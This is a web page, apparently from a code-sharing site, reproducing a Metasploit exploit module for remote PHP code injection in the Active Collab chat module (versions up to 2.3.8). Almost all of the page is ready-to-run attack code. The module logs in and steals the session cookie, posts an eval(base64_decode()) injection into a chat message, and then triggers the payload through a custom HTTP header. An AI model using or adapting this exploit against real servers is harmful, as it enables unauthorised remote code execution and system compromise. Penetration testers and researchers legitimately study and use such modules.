扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'Active Collab "chat module" <= 2.3.8 Remote PHP Code Injection Exploit', 'Description'=> %q{ This module exploits an arbitrary code injection vulnerability in the chat module that is part of Active Collab by abusing a preg_replace() using the /e modifier and its replacement string using double quotes. The vulnerable function can be found in activecollab/application/modules/chat/functions/html_to_text.php. }, 'License'=> MSF_LICENSE, 'Author' => [ 'mr_me <steventhomasseeley[at]gmail.com>',# vuln discovery & msf module ], 'References' => [ ['URL', 'http://www.activecollab.com/downloads/category/4/package/62/releases'], ], 'Privileged' => false, 'Payload'=> { 'Keys'=> ['php'], 'Space' => 4000, 'DisableNops' => true, }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets'=> [['Automatic',{}]], 'DisclosureDate' => 'May 30 2012', 'DefaultTarget'=> 0)) register_options( [ OptString.new('URI',[true, "The path to the ActiveCollab installation", "/"]), OptString.new('USER',[true, "The username (e-mail) to authenticate with"]), OptString.new('PASS',[true, "The password to authenticate with"]) ],self.class) end def check login_path = "public/index.php?path_info=login&re_route=homepage" uri = datastore['URI'] uri += (datastore['URI'][-1, 1] == "/") ? login_path : "/#{login_path}" cms = send_request_raw({'uri' => uri}, 25) uri = datastore['URI'] uri += (datastore['URI'][-1, 1] == "/") ? 'public/assets/modules/chat/' : '/public/assets/modules/chat/' chat = send_request_raw({'uri' => uri}, 25) # cant detect the version here if (cms and cms.body =~ /powered by activeCollab/) # detect the chat module if (chat and chat.code == 200) return Exploit::CheckCode::Vulnerable end end return Exploit::CheckCode::Safe end def exploit user = datastore['USER'] pass = datastore['PASS'] p = Rex::Text.encode_base64(payload.encoded) header = rand_text_alpha_upper(3) login_uri = datastore['URI'] login_uri += (datastore['URI'][-1, 1] == "/") ? 'public/index.php?path_info=login' : '/public/index.php?path_info=login' # login res = send_request_cgi({ 'method'=> 'POST', 'uri' => login_uri, 'vars_post' => { 'login[email]'=> user, 'login[password]' => pass, 'submitted' => "submitted", } }, 40) # response handling if res.code == 302 if (res.headers['Set-Cookie'] =~ /ac_ActiveCollab_sid_eaM4h3LTIZ=(.*); expires=/) acsession = $1 end elsif res.body =~ /Failed to log you in/ print_error("Could not login to the target application, check your credentials") elsif res.code != 200 or res.code != 302 print_error("Server returned a failed status code: (#{res.code})") end # injection iuri = datastore['URI'] iuri += (datastore['URI'][-1, 1] == "/") ? 'index.php' : '/index.php' iuri << "?path_info=chat/add_message&async=1" phpkode = "{\${eval(base64_decode(\$_SERVER[HTTP_#{header}]))}}" injection = "<th>\");#{phpkode}</th>" cookies = "ac_ActiveCollab_sid_eaM4h3LTIZ=#{acsession}" res = send_request_cgi({ 'method'=> 'POST', 'uri' => iuri, 'headers' => { 'cookie'=> cookies }, 'vars_post' => { 'submitted'=> "submitted", 'message[message_text]'=> injection, 'message[chat_id]' => "1", 'message[posted_to_user_id]' => "all" } }, 25) euri = datastore['URI'] euri += (datastore['URI'][-1, 1] == "/") ? 'public/index.php' : '/public/index.php' euri << "?path_info=/chat/history/1" # execution res = send_request_cgi({ 'method'=> 'POST', 'uri' => euri, 'headers' => { header=> p, 'cookie'=> cookies } }) end end |
体验盒子
